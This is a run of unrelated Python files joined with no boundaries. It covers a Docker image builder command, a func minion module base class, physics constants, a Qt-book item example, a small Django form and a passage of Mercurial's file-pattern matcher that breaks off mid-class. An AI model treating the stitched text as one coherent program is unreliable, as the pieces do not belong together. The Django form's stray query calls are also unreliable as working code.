                    context_path = self.get_matching_pattern(img_cfg, 'path', path)
                    if found_image_name == image_name:
                        image = ImageBuilder(image_name,
                            contextPath=context_path,
                            dockerfile=path,
                            tagResolver=self,
                            **self.kwds
                        )
                        self.images[image_name] = image
                        return image
        raise KeyError("Cannot find image %s" % image_name)

    def imageTag(self, imgName) :
        imgBuilder = self.images.get(imgName, None)
        if imgBuilder :
            return imgBuilder.buildTag()
        return None

    def build(self, client, names=None, child_images=[]) :
        if isinstance(names, six.string_types):
            names = [names]
        def iter_buildable_deps(name):
            """
            instanciates a builder for each image dependency
            does nothing when the image cannot be build
            """
            for dep_name, _ in self.getImage(name).imageDeps():
                try:
                    self.getImage(dep_name)
                    yield dep_name
                except KeyError:
                    continue
        for name in names:
            if name in child_images:
                raise RuntimeError("dependency loop detected, %s some how depends on itself %s" %
                    (name, ' -> '.join(child_images + [name]))
                )
            for dep_name in iter_buildable_deps(name):
                self.build(client, dep_name, child_images=child_images+[name])

        for name in names:
            self.getImage(name).build(client)

    def tag(self, client, tags, images, **kwds):
        if tags is None:
            tags = ['latest']
        for image in images:
            self.getImage(image).tag(client, tags, **kwds)


COMMAND_NAME='build'
def add_options(parser):
    from . import addCommonOptions, commonSetUp
    from .dockerfile import addDockerfileOptions
    from .image import addImageOptions
    try:
        add = parser.add_argument
    except AttributeError:
        add = parser.add_option
    add("image", nargs="*",
                      help="images to build")
    add("-t", "--tag", dest="tag", default=None, action='append',
                      help="tag(s) to be applied to the resulting image in case of success")
    add("--registry", dest="registry", default=[], action='append',
                      help="Registry on which the image should tagged (<registry>/<name>:<tag>)")
    addCommonOptions(parser)
    addDockerfileOptions(parser)
    addImageOptions(parser)

def main(argv=sys.argv, args=None) :
    """
    Builds a list of images
    """
    from . import commonSetUp
    if not args:
        import argparse
        parser = argparse.ArgumentParser()
        add_options(parser)
        args = parser.parse_args(argv[1:])
    import sys, os
    import yaml
    from docker import Client
    from . import commonSetUp
    commonSetUp(args)
    builder = Builder()
    builder.build(Client.from_env(), args.image)
    builder.tag(Client.from_env(), args.tag, args.image, registries=args.registry)

if __name__ == "__main__" :
    main()

##
## Copyright 2007, Red Hat, Inc
## see AUTHORS
##
## This software may be freely redistributed under the terms of the GNU
## general public license.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##

import inspect

from func import logger
from func.config import read_config, BaseConfig
from func.commonconfig import FuncdConfig
from func.minion.func_arg import * #the arg getter stuff

class FuncModule(object):

    # the version is meant to
    version = "0.0.0"
    api_version = "0.0.0"
    description = "No Description provided"

    class Config(BaseConfig):
        pass

    def __init__(self):

        config_file = '/etc/func/minion.conf'
        self.config = read_config(config_file, FuncdConfig)
        self.__init_log()
        self.__base_methods = {
            # __'s so we don't clobber useful names
            "module_version" : self.__module_version,
            "module_api_version" : self.__module_api_version,
            "module_description" : self.__module_description,
            "list_methods"       : self.__list_methods,
            "get_method_args"    : self.__get_method_args,
        }
        self.__init_options()

    def __init_log(self):
        log = logger.Logger()
        self.logger = log.logger

    def __init_options(self):
        options_file = '/etc/func/modules/'+self.__class__.__name__+'.conf'
        self.options = read_config(options_file, self.Config)
        return

    def register_rpc(self, handlers, module_name):
        # add the internal methods, note that this means they
        # can get clobbbered by subclass versions
        for meth in self.__base_methods:
            handlers["%s.%s" % (module_name, meth)] = self.__base_methods[meth]

        # register our module's handlers
        for name, handler in self.__list_handlers().items():
            handlers["%s.%s" % (module_name, name)] = handler

    def __list_handlers(self):
        """ Return a dict of { handler_name, method, ... }.
        All methods that do not being with an underscore will be exposed.
        We also make sure to not expose our register_rpc method.
        """
        handlers = {}
        for attr in dir(self):
            if self.__is_public_valid_method(attr):
                handlers[attr] = getattr(self, attr)
        return handlers

    def __list_methods(self):
        return self.__list_handlers().keys() + self.__base_methods.keys()

    def __module_version(self):
        return self.version

    def __module_api_version(self):
        return self.api_version

    def __module_description(self):
        return self.description

    def __is_public_valid_method(self,attr):
        if inspect.ismethod(getattr(self, attr)) and attr[0] != '_' and\
                attr != 'register_rpc' and attr!='register_method_args':
                    return True
        return False

    def __get_method_args(self):
        """
        Gets arguments with their formats according to ArgCompatibility
        class' rules.

        @return : dict with args or Raise Exception if something wrong
        happens
        """
        tmp_arg_dict = self.register_method_args()

        #if it is not implemeted then return empty stuff 
        if not tmp_arg_dict:
            return {}

        #see if user tried to register an not implemented method :)
        for method in tmp_arg_dict.iterkeys():
            if not hasattr(self,method):
                raise NonExistingMethodRegistered("%s is not in %s "%(method,self.__class__.__name__))
        
        #create argument validation instance
        self.arg_comp = ArgCompatibility(tmp_arg_dict)
        #see if all registered arguments are there
        for method in tmp_arg_dict.iterkeys():
            self.arg_comp.is_all_arguments_registered(self,method,tmp_arg_dict[method]['args'])
        #see if the options that were used are OK..
        self.arg_comp.validate_all()

        return tmp_arg_dict 

    def register_method_args(self):
        """
        That is the method where users should override in their
        modules according to be able to send their method arguments
        to the Overlord. If they dont have it nothing breaks
        just that one in the base class is called

        @return : empty {}
        """

        # to know they didnt implement it
        return {}
    

import math as mth
import numpy as np

#----------------------
# J Matthews, 21/02
# This is a file containing useful constants for python coding
#
# Units in CGS unless stated
#
#----------------------


#H=6.62606957E-27
HEV=4.13620e-15
#C=29979245800.0
#BOLTZMANN=1.3806488E-16
VERY_BIG=1e50
H=6.6262e-27
HC=1.98587e-16
HEV=4.13620e-15	# Planck's constant in eV 
HRYD=3.04005e-16     # NSH 1204 Planck's constant in Rydberg 
C  =2.997925e10
G=6.670e-8
BOLTZMANN =1.38062e-16
WIEN=	5.879e10       # NSH 1208 Wien Disp Const in frequency units 
H_OVER_K=4.799437e-11
STEFAN_BOLTZMANN =5.6696e-5
THOMPSON=0.66524e-24
PI  =	3.1415927
MELEC =	9.10956e-28
E=	4.8035e-10	# Electric charge in esu 
MPROT =	1.672661e-24
MSOL =	1.989e33
PC=	3.08e18
YR   =	3.1556925e7
PI_E2_OVER_MC=0.02655103	# Classical cross-section 
PI_E2_OVER_M  =7.96e8
ALPHA=	7.297351e-3	# Fine structure constant 
BOHR=	0.529175e-8	# Bohr radius 
CR=	3.288051e15	#Rydberg frequency for H != Ryd freq for infinite mass 
ANGSTROM  = 1.e-8           #Definition of an Angstrom in units of this code, e.g. cm 
EV2ERGS   =1.602192e-12
RADIAN=	57.29578
RYD2ERGS =2.1798741e-11



PARSEC=3.086E18

def format_path( str ):
	while( str.find( '//' ) != -1 ):
		str = str.replace( '//', '/' )
	return str

#!/usr/bin/env python3
# Copyright (c) 2008-9 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.

"""Provides the Item example classes.
"""

class Item(object):

    def __init__(self, artist, title, year=None):
        self.__artist = artist
        self.__title = title
        self.__year = year


    def artist(self):
        return self.__artist


    def setArtist(self, artist):
        self.__artist = artist


    def title(self):
        return self.__title


    def setTitle(self, title):
        self.__title = title


    def year(self):
        return self.__year


    def setYear(self, year):
        self.__year = year


    def __str__(self):
        year = ""
        if self.__year is not None:
            year = " in {0}".format(self.__year)
        return "{0} by {1}{2}".format(self.__title, self.__artist, year)


class Painting(Item):

    def __init__(self, artist, title, year=None):
        super(Painting, self).__init__(artist, title, year)


class Sculpture(Item):

    def __init__(self, artist, title, year=None, material=None):
        super(Sculpture, self).__init__(artist, title, year)
        self.__material = material


    def material(self):
        return self.__material


    def setMaterial(self, material):
        self.__material = material


    def __str__(self):
        materialString = ""
        if self.__material is not None:
            materialString = " ({0})".format(self.__material)
        return "{0}{1}".format(super(Sculpture, self).__str__(),
                               materialString)


class Dimension(object):

    def __init__(self, width, height, depth=None):
        self.__width = width
        self.__height = height
        self.__depth = depth


    def width(self):
        return self.__width


    def setWidth(self, width):
        self.__width = width


    def height(self):
        return self.__height


    def setHeight(self, height):
        self.__height = height


    def depth(self):
        return self.__depth


    def setDepth(self, depth):
        self.__depth = depth


    def area(self):
        raise NotImplemented


    def volume(self):
        raise NotImplemented



if __name__ == "__main__":
    items = []
    items.append(Painting("Cecil Collins", "The Poet", 1941))
    items.append(Painting("Cecil Collins", "The Sleeping Fool", 1943))
    items.append(Painting("Edvard Munch", "The Scream", 1893))
    items.append(Painting("Edvard Munch", "The Sick Child", 1896))
    items.append(Painting("Edvard Munch", "The Dance of Life", 1900))
    items.append(Sculpture("Auguste Rodin", "Eternal Springtime", 1917,
                           "plaster"))
    items.append(Sculpture("Auguste Rodin", "Naked Balzac", 1917,
                           "plaster"))
    items.append(Sculpture("Auguste Rodin", "The Secret", 1925,
                           "bronze"))
    uniquematerials = set()
    for item in items:
        print(item)
        if hasattr(item, "material"):
            uniquematerials.add(item.material())
    print("Sculptures use {0} unique materials".format(
          len(uniquematerials)))


#!/usr/bin/env python
# -*- coding:utf-8 -*-

"""
@author: Will
"""
from django import forms
from app01 import models

class ImportFrom(forms.Form):

        HOST_TYPE=((1,"001"),(2,"002"))  #替換爲文件
        host_type = forms.IntegerField(
            widget=forms.Select(choices=HOST_TYPE)
        )

        hostname = forms.CharField()

        def __init__(self,*args,**kwargs):
            super(ImportFrom,self).__init__(*args,**kwargs)
            HOST_TYPE=((1,"001"),(2,"002"))  #替換爲文件

            self.fields['host_type'].widget.choices = models.userInfo.objects.all().values_list("id","name")
            models.userInfo.objects.get()
            models.userInfo.objects.filter()














# Portions Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.

# match.py - filename matching
#
#  Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import, print_function

import copy
import os
import re

from bindings import pathmatcher

from . import error, pathutil, pycompat, util
from .i18n import _
from .pycompat import decodeutf8


allpatternkinds = (
    "re",
    "glob",
    "path",
    "relglob",
    "relpath",
    "relre",
    "listfile",
    "listfile0",
    "set",
    "include",
    "subinclude",
    "rootfilesin",
)
cwdrelativepatternkinds = ("relpath", "glob")

propertycache = util.propertycache


def _rematcher(regex):
    """compile the regexp with the best available regexp engine and return a
    matcher function"""
    m = util.re.compile(regex)
    try:
        # slightly faster, provided by facebook's re2 bindings
        return m.test_match
    except AttributeError:
        return m.match


def _expandsets(kindpats, ctx):
    """Returns the kindpats list with the 'set' patterns expanded."""
    fset = set()
    other = []

    for kind, pat, source in kindpats:
        if kind == "set":
            if not ctx:
                raise error.ProgrammingError("fileset expression with no " "context")
            s = ctx.getfileset(pat)
            fset.update(s)
            continue
        other.append((kind, pat, source))
    return fset, other


def _expandsubinclude(kindpats, root):
    """Returns the list of subinclude matcher args and the kindpats without the
    subincludes in it."""
    relmatchers = []
    other = []

    for kind, pat, source in kindpats:
        if kind == "subinclude":
            sourceroot = pathutil.dirname(util.normpath(source))
            pat = util.pconvert(pat)
            path = pathutil.join(sourceroot, pat)

            newroot = pathutil.dirname(path)
            matcherargs = (newroot, "", [], ["include:%s" % path])

            prefix = pathutil.canonpath(root, root, newroot)
            if prefix:
                prefix += "/"
            relmatchers.append((prefix, matcherargs))
        else:
            other.append((kind, pat, source))

    return relmatchers, other


def _kindpatsalwaysmatch(kindpats):
    """ "Checks whether the kindspats match everything, as e.g.
    'relpath:.' does.
    """
    for kind, pat, source in kindpats:
        # TODO: update me?
        if pat != "" or kind not in ["relpath", "glob"]:
            return False
    return True


def match(
    root,
    cwd,
    patterns=None,
    include=None,
    exclude=None,
    default="glob",
    exact=False,
    auditor=None,
    ctx=None,
    warn=None,
    badfn=None,
    icasefs=False,
):
    """build an object to match a set of file patterns

    arguments:
    root - the canonical root of the tree you're matching against
    cwd - the current working directory, if relevant
    patterns - patterns to find
    include - patterns to include (unless they are excluded)
    exclude - patterns to exclude (even if they are included)
    default - if a pattern in patterns has no explicit type, assume this one
    exact - patterns are actually filenames (include/exclude still apply)
    warn - optional function used for printing warnings
    badfn - optional bad() callback for this matcher instead of the default
    icasefs - make a matcher for wdir on case insensitive filesystems, which
        normalizes the given patterns to the case in the filesystem

    a pattern is one of:
    'glob:<glob>' - a glob relative to cwd
    're:<regexp>' - a regular expression
    'path:<path>' - a path relative to repository root, which is matched
                    recursively
    'rootfilesin:<path>' - a path relative to repository root, which is
                    matched non-recursively (will not match subdirectories)
    'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
    'relpath:<path>' - a path relative to cwd
    'relre:<regexp>' - a regexp that needn't match the start of a name
    'set:<fileset>' - a fileset expression
    'include:<path>' - a file of patterns to read and include
    'subinclude:<path>' - a file of patterns to match against files under
                          the same directory
    '<something>' - a pattern of the specified default type
    """
    if auditor is None:
        auditor = pathutil.pathauditor(root)
    normalize = _donormalize
    if icasefs:
        if exact:
            raise error.ProgrammingError(
                "a case-insensitive exact matcher " "doesn't make sense"
            )
        dirstate = ctx.repo().dirstate
        dsnormalize = dirstate.normalize

        def normalize(patterns, default, root, cwd, auditor, warn):
            kp = _donormalize(patterns, default, root, cwd, auditor, warn)
            kindpats = []
            for kind, pats, source in kp:
                if kind not in ("re", "relre"):  # regex can't be normalized
                    p = pats
                    pats = dsnormalize(pats)

                    # Preserve the original to handle a case only rename.
                    if p != pats and p in dirstate:
                        kindpats.append((kind, p, source))

                kindpats.append((kind, pats, source))
            return kindpats

    if exact:
        m = exactmatcher(root, cwd, patterns, badfn)
    elif patterns:
        kindpats = normalize(patterns, default, root, cwd, auditor, warn)
        if _kindpatsalwaysmatch(kindpats):
            m = alwaysmatcher(root, cwd, badfn, relativeuipath=True)
        else:
            m = patternmatcher(root, cwd, kindpats, ctx=ctx, badfn=badfn)
    else:
        # It's a little strange that no patterns means to match everything.
        # Consider changing this to match nothing (probably using nevermatcher).
        m = alwaysmatcher(root, cwd, badfn)

    if include:
        kindpats = normalize(include, "glob", root, cwd, auditor, warn)
        im = includematcher(root, cwd, kindpats, ctx=ctx, badfn=None)
        m = intersectmatchers(m, im)
    if exclude:
        kindpats = normalize(exclude, "glob", root, cwd, auditor, warn)
        em = includematcher(root, cwd, kindpats, ctx=ctx, badfn=None)
        m = differencematcher(m, em)
    return m


def exact(root, cwd, files, badfn=None):
    return exactmatcher(root, cwd, files, badfn=badfn)


def always(root, cwd):
    return alwaysmatcher(root, cwd)


def never(root, cwd):
    return nevermatcher(root, cwd)


def union(matches, root, cwd):
    """Union a list of matchers.

    If the list is empty, return nevermatcher.
    If the list only contains one non-None value, return that matcher.
    Otherwise return a union matcher.
    """
    matches = list(filter(None, matches))
    if len(matches) == 0:
        return nevermatcher(root, cwd)
    elif len(matches) == 1:
        return matches[0]
    else:
        return unionmatcher(matches)


def badmatch(match, badfn):
    """Make a copy of the given matcher, replacing its bad method with the given
    one.
    """
    m = copy.copy(match)
    m.bad = badfn
    return m


def _donormalize(patterns, default, root, cwd, auditor, warn):
    """Convert 'kind:pat' from the patterns list to tuples with kind and
    normalized and rooted patterns and with listfiles expanded."""
    kindpats = []
    for kind, pat in [_patsplit(p, default) for p in patterns]:
        if kind in cwdrelativepatternkinds:
            pat = pathutil.canonpath(root, cwd, pat, auditor)
        elif kind in ("relglob", "path", "rootfilesin"):
            pat = util.normpath(pat)
        elif kind in ("listfile", "listfile0"):
            try:
                files = decodeutf8(util.readfile(pat))
                if kind == "listfile0":
                    files = files.split("\0")
                else:
                    files = files.splitlines()
                files = [f for f in files if f]
            except EnvironmentError:
                raise error.Abort(_("unable to read file list (%s)") % pat)
            for k, p, source in _donormalize(files, default, root, cwd, auditor, warn):
                kindpats.append((k, p, pat))
            continue
        elif kind == "include":
            try:
                fullpath = os.path.join(root, util.localpath(pat))
                includepats = readpatternfile(fullpath, warn)
                for k, p, source in _donormalize(
                    includepats, default, root, cwd, auditor, warn
                ):
                    kindpats.append((k, p, source or pat))
            except error.Abort as inst:
                raise error.Abort("%s: %s" % (pat, inst[0]))
            except IOError as inst:
                if warn:
                    warn(
                        _("skipping unreadable pattern file '%s': %s\n")
                        % (pat, inst.strerror)
                    )
            continue
        # else: re or relre - which cannot be normalized
        kindpats.append((kind, pat, ""))
    return kindpats


def _testrefastpath(repat):
    """Test if a re pattern can use fast path.

    That is, for every "$A/$B" path the pattern matches, "$A" must also be
    matched,

    Return True if we're sure it is. Return False otherwise.
    """
    # XXX: It's very hard to implement this. These are what need to be
    # supported in production and tests. Very hacky. But we plan to get rid
    # of re matchers eventually.

    # Rules like "(?!experimental/)"
    if repat.startswith("(?!") and repat.endswith(")") and repat.count(")") == 1:
        return True

    # Rules used in doctest
    if repat == "(i|j)$":
        return True

    return False


def _globpatsplit(pat):
    """Split a glob pattern. Return a list.

    A naive version is "path.split("/")". This function handles more cases, like
    "{*,{a,b}*/*}".

    >>> _globpatsplit("*/**/x/{a,b/c}")
    ['*', '**', 'x', '{a,b/c}']
    """
    result = []
    buf = ""
    parentheses = 0
    for ch in pat:
        if ch == "{":
            parentheses += 1
        elif ch == "}":
            parentheses -= 1
        if parentheses == 0 and ch == "/":
            if buf:
                result.append(buf)
                buf = ""
        else:
            buf += ch
    if buf:
        result.append(buf)
    return result


class _tree(dict):
    """A tree intended to answer "visitdir" questions with more efficient
    answers (ex. return "all" or False if possible).
    """

    def __init__(self, *args, **kwargs):
        # If True, avoid entering subdirectories, and match everything recursively,
        # unconditionally.
        self.matchrecursive = False
        # If True, avoid entering subdirectories, and return "unsure" for
        # everything. This is set to True when complex re patterns (potentially
        # including "/") are used.
        self.unsurerecursive = False
        # Patterns for matching paths in this directory.
        self._kindpats = []
        # Glob patterns used to match parent directories of another glob
        # pattern.
        self._globdirpats = []
        super(_tree, self).__init__(*args, **kwargs)

    def insert(self, path, matchrecursive=True, globpats=None, repats=None):
        """Insert a directory path to this tree.

        If matchrecursive is True, mark the directory as unconditionally
        include files and subdirs recursively.

        If globpats or repats are specified, append them to the patterns being
        applied at this directory. The tricky part is those patterns can match
        "x/y/z" and visit("x"), visit("x/y") need to return True, while we
        still want visit("x/a") to return False.
        """
        if path == "":
            self.matchrecursive |= matchrecursive
            if globpats:
                # Need to match parent directories too.
                for pat in globpats:
                    components = _globpatsplit(pat)
                    parentpat = ""
                    for comp in components:
                        if parentpat:
                            parentpat += "/"
                        parentpat += comp
                        if "/" in comp:
                            # Giving up - fallback to slow paths.
                            self.unsurerecursive = True
                        self._globdirpats.append(parentpat)
                if any("**" in p for p in globpats):
                    # Giving up - "**" matches paths including "/"
                    self.unsurerecursive = True
                self._kindpats += [("glob", pat, "") for pat in globpats]
            if repats:
                if not all(map(_testrefastpath, repats)):
                    # Giving up - fallback to slow paths.
                    self.unsurerecursive = True
                self._kindpats += [("re", pat, "") for pat in repats]
            return

        subdir, rest = self._split(path)
        self.setdefault(subdir, _tree()).insert(rest, matchrecursive, globpats, repats)

    def visitdir(self, path):
        """Similar to matcher.visitdir"""
        path = normalizerootdir(path, "visitdir")
        if self.matchrecursive:
            return "all"
        elif self.unsurerecursive:
            return True
        elif path == "":
            return True

        if self._kindpats and self._compiledpats(path):
            # XXX: This is incorrect. But re patterns are already used in
            # production. We should kill them!
            # Need to test "if every string starting with 'path' matches".
            # Obviously it's impossible to test *every* string with the
            # standard regex API, therefore pick a random strange path to test
            # it approximately.
            if self._compiledpats("%s/*/_/-/0/*" % path):
                return "all"
            else:
                return True

        if self._globdirpats and self._compileddirpats(path):
            return True

        subdir, rest = self._split(path)
        subtree = self.get(subdir)
        if subtree is None:
            return False
        else:
            return subtree.visitdir(rest)

    @util.propertycache
    def _compiledpats(self):
        pat, matchfunc = _buildregexmatch(self._kindpats, "")
        return matchfunc

    @util.propertycache
    def _compileddirpats(self):
        pat, matchfunc = _buildregexmatch(
            [("glob", p, "") for p in self._globdirpats], "$"
        )
        return matchfunc

    def _split(self, path):
        if "/" in path:
            subdir, rest = path.split("/", 1)
        else:
            subdir, rest = path, ""
        if not subdir:
            raise error.ProgrammingError("path cannot be absolute")
        return subdir, rest


def _remainingpats(pat, prefix):
    """list of patterns with prefix stripped

    >>> _remainingpats("a/b/c", "")
    ['a/b/c']
    >>> _remainingpats("a/b/c", "a")
    ['b/c']
    >>> _remainingpats("a/b/c", "a/b")
    ['c']
    >>> _remainingpats("a/b/c", "a/b/c")
    []
    >>> _remainingpats("", "")
    []
    """
    if prefix:
        if prefix == pat:
            return []
        else:
            assert pat[len(prefix)] == "/"
            return [pat[len(prefix) + 1 :]]
    else:
        if pat:
            return [pat]
        else:
            return []


def _buildvisitdir(kindpats):
    """Try to build an efficient visitdir function

    Return a visitdir function if it's built. Otherwise return None
    if there are unsupported patterns.

    >>> _buildvisitdir([('include', 'foo', '')])
    >>> _buildvisitdir([('relglob', 'foo', '')])
    >>> t = _buildvisitdir([
    ...     ('glob', 'a/b', ''),
    ...     ('glob', 'c/*.d', ''),
    ...     ('glob', 'e/**/*.c', ''),
    ...     ('re', '^f/(?!g)', ''), # no "$", only match prefix
    ...     ('re', '^h/(i|j)$', ''),
    ...     ('glob', 'i/a*/b*/c*', ''),
    ...     ('glob', 'i/a5/b7/d', ''),
    ...     ('glob', 'j/**.c', ''),
    ... ])
    >>> t('a')
    True
    >>> t('a/b')
    'all'
    >>> t('a/b/c')
    'all'
    >>> t('c')
    True
    >>> t('c/d')
    False
    >>> t('c/rc.d')
    'all'
    >>> t('c/rc.d/foo')
    'all'
    >>> t('e')
    True
    >>> t('e/a')
    True
    >>> t('e/a/b.c')
    True
    >>> t('e/a/b.d')
    True
    >>> t('f')
    True
    >>> t('f/g')
    False
    >>> t('f/g2')
    False
    >>> t('f/g/a')
    False
    >>> t('f/h')
    'all'
    >>> t('f/h/i')
    'all'
    >>> t('h/i')
    True
    >>> t('h/i/k')
    False
    >>> t('h/k')
    False
    >>> t('i')
    True
    >>> t('i/a1')
    True
    >>> t('i/b2')
    False
    >>> t('i/a/b2/c3')
    'all'
    >>> t('i/a/b2/d4')
    False
    >>> t('i/a5/b7/d')
    'all'
    >>> t('j/x/y')
    True
    >>> t('z')
    False
    """
    tree = _tree()
    for kind, pat, _source in kindpats:
        if kind == "glob":
            components = []
            for p in pat.split("/"):
                if "[" in p or "{" in p or "*" in p or "?" in p:
                    break
                components.append(p)
            prefix = "/".join(components)
            matchrecursive = prefix == pat
            tree.insert(
                prefix,
                matchrecursive=matchrecursive,
                globpats=_remainingpats(pat, prefix),
            )
        elif kind == "re":
            # Still try to get a plain prefix from the regular expression so we
            # can still have fast paths.
            if pat.startswith("^"):
                # "re" already matches from the beginning, unlike "relre"
                pat = pat[1:]
            components = []
            for p in pat.split("/"):
                if re.escape(p) != p:
                    # contains special characters
                    break
                components.append(p)
            prefix = "/".join(components)
            tree.insert(
                prefix, matchrecursive=False, repats=_remainingpats(pat, prefix)
            )
        else:
            # Unsupported kind
            return None
    return tree.visitdir


class basematcher(object):
    def __init__(self, root, cwd, badfn=None, relativeuipath=True):
        self._root = root
        self._cwd = cwd
        if badfn is not None:
            self.bad = badfn
        self._relativeuipath = relativeuipath

    def __repr__(self):
        return "<%s>" % self.__class__.__name__

    def __call__(self, fn):
        return self.matchfn(fn)

    def __iter__(self):
        for f in self._files:
            yield f

    # Callbacks related to how the matcher is used by dirstate.walk.
    # Subscribers to these events must monkeypatch the matcher object.
    def bad(self, f, msg):
        """Callback from dirstate.walk for each explicit file that can't be
        found/accessed, with an error message."""

    # If an traversedir is set, it will be called when a directory discovered
    # by recursive traversal is visited.
    traversedir = None

    def abs(self, f):
        """Convert a repo path back to path that is relative to the root of the
        matcher."""
        return f

    def rel(self, f):
        """Convert repo path back to path that is relative to cwd of matcher."""
        return util.pathto(self._root, self._cwd, f)

    def uipath(self, f):
        """Convert repo path to a display path.  If patterns or -I/-X were used
        to create this matcher, the display path will be relative to cwd.
        Otherwise it is relative to the root of the repo."""
        return (self._relativeuipath and self.rel(f)) or self.abs(f)

    @propertycache
    def _files(self):
        return []

    def files(self):
        """Explicitly listed files or patterns or roots:
        if no patterns or .always(): empty list,
        if exact: list exact files,
        if not .anypats(): list all files and dirs,
        else: optimal roots"""
        return self._files

    @propertycache
    def _fileset(self):
        return set(self._files)

    def exact(self, f):
        """Returns True if f is in .files()."""
        return f in self._fileset

    def matchfn(self, f):
        return False

    def visitdir(self, dir):
        """Decides whether a directory should be visited based on whether it
        has potential matches in it or one of its subdirectories. This is
        based on the match's primary, included, and excluded patterns.

        Returns the string 'all' if the given directory and all subdirectories
        should be visited. Otherwise returns True or False indicating whether
        the given directory should be visited.
        """
        return True

    def always(self):
        """Matcher will match everything and .files() will be empty --
        optimization might be possible."""
        return False

    def isexact(self):
        """Matcher will match exactly the list of files in .files() --
        optimization might be possible."""
        return False

    def prefix(self):
        """Matcher will match the paths in .files() recursively --
        optimization might be possible."""
        return False

    def anypats(self):
        """None of .always(), .isexact(), and .prefix() is true --
        optimizations will be difficult."""
        return not self.always() and not self.isexact() and not self.prefix()


class alwaysmatcher(basematcher):
    """Matches everything."""

    def __init__(self, root, cwd, badfn=None, relativeuipath=False):
        super(alwaysmatcher, self).__init__(
            root, cwd, badfn, relativeuipath=relativeuipath
        )

    def always(self):
        return True

    def matchfn(self, f):
        return True

    def visitdir(self, dir):
        return "all"

    def __repr__(self):
        return "<alwaysmatcher>"


class nevermatcher(basematcher):
    """Matches nothing."""

    def __init__(self, root, cwd, badfn=None):
        super(nevermatcher, self).__init__(root, cwd, badfn)

    # It's a little weird to say that the nevermatcher is an exact matcher
    # or a prefix matcher, but it seems to make sense to let callers take
    # fast paths based on either. There will be no exact matches, nor any
    # prefixes (files() returns []), so fast paths iterating over them should
    # be efficient (and correct).
    def isexact(self):
        return True

    def prefix(self):
        return True

    def visitdir(self, dir):
        return False

    def __repr__(self):
        return "<nevermatcher>"


class gitignorematcher(basematcher):
    """Match files specified by ".gitignore"s"""

    def __init__(self, root, cwd, badfn=None, gitignorepaths=None):
        super(gitignorematcher, self).__init__(root, cwd, badfn)
        gitignorepaths = gitignorepaths or []
        self._matcher = pathmatcher.gitignorematcher(root, gitignorepaths)

    def matchfn(self, f):
        # XXX: is_dir is set to True here for performance.
        # It should be set to whether "f" is actually a directory or not.
        return self._matcher.match_relative(f, True)

    def explain(self, f):
        return self._matcher.explain(f, True)

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        matched = self._matcher.match_relative(dir, True)
        if matched:
            # Everything in the directory is selected (ignored)
            return "all"
        else:
            # Not sure
            return True

    def __repr__(self):
        return "<gitignorematcher>"


class treematcher(basematcher):
    """Match glob patterns with negative pattern support.
    Have a smarter 'visitdir' implementation.
    """

    def __init__(self, root, cwd, badfn=None, rules=[]):
        super(treematcher, self).__init__(root, cwd, badfn)
        rules = list(rules)
        self._matcher = pathmatcher.treematcher(rules)
        self._rules = rules

    def matchfn(self, f):
        return self._matcher.matches(f)

    def visitdir(self, dir):
        matched = self._matcher.match_recursive(dir)
        if matched is None:
            return True
        elif matched is True:
            return "all"
        else:
            assert matched is False
            return False

    def __repr__(self):
        return "<treematcher rules=%r>" % self._rules


def normalizerootdir(dir, funcname):
    if dir == ".":
        util.nouideprecwarn(
            "match.%s() no longer accepts '.', use '' instead." % funcname, "20190805"
        )
        return ""
    return dir


def _kindpatstoglobs(kindpats, recursive=False):
    """Attempt to convert 'kindpats' to glob patterns that can be used in a
    treematcher.

    kindpats should be already normalized to be relative to repo root.

    If recursive is True, `glob:a*` will match both `a1/b` and `a1`, otherwise
    `glob:a*` will only match `a1` but not `a1/b`.

    Return None if there are unsupported patterns (ex. regular expressions).
    """
    if not _usetreematcher:
        return None
    globs = []
    for kindpat in kindpats:
        kind, pat = kindpat[0:2]
        if kind == "re":
            # Attempt to convert the re pat to globs
            reglobs = _convertretoglobs(pat)
            if reglobs is not None:
                globs += reglobs
            else:
                return None
        elif kind == "glob":
            # The treematcher (man gitignore) does not support csh-style
            # brackets (ex. "{a,b,c}"). Expand the brackets to patterns.
            for subpat in pathmatcher.expandcurlybrackets(pat):
                normalized = pathmatcher.normalizeglob(subpat)
                if recursive:
                    normalized = _makeglobrecursive(normalized)
                globs.append(normalized)
        elif kind == "path":
            if pat == ".":
                # Special case. Comes from `util.normpath`.
                pat = ""
            else:
                pat = pathmatcher.plaintoglob(pat)
            pat = _makeglobrecursive(pat)
            globs.append(pat)
        else:
            return None
    return globs


def _makeglobrecursive(pat):
    """Make a glob pattern recursive by appending "/**" to it"""
    if pat.endswith("/") or not pat:
        return pat + "**"
    else:
        return pat + "/**"


# re:x/(?!y/)
# meaning: include x, but not x/y.
_repat1 = re.compile(r"^\^?([\w._/]+)/\(\?\!([\w._/]+)/?\)$")

# re:x/(?:.*/)?y
# meaning: glob:x/**/y
_repat2 = re.compile(r"^\^?([\w._/]+)/\(\?:\.\*/\)\?([\w._]+)(?:\(\?\:\/\|\$\))?$")


def _convertretoglobs(repat):
    """Attempt to convert a regular expression pattern to glob patterns.

    A single regular expression pattern might be converted into multiple
    glob patterns.

    Return None if conversion is unsupported.

    >>> _convertretoglobs("abc*") is None
    True
    >>> _convertretoglobs("xx/yy/(?!zz/kk)")
    ['xx/yy/**', '!xx/yy/zz/kk/**']
    >>> _convertretoglobs("x/y/(?:.*/)?BUCK")
    ['x/y/**/BUCK']
    """
    m = _repat1.match(repat)
    if m:
        prefix, excluded = m.groups()
        return ["%s/**" % prefix, "!%s/%s/**" % (prefix, excluded)]
    m = _repat2.match(repat)
    if m:
        prefix, name = m.groups()
        return ["%s/**/%s" % (prefix, name)]
    return None


class patternmatcher(basematcher):
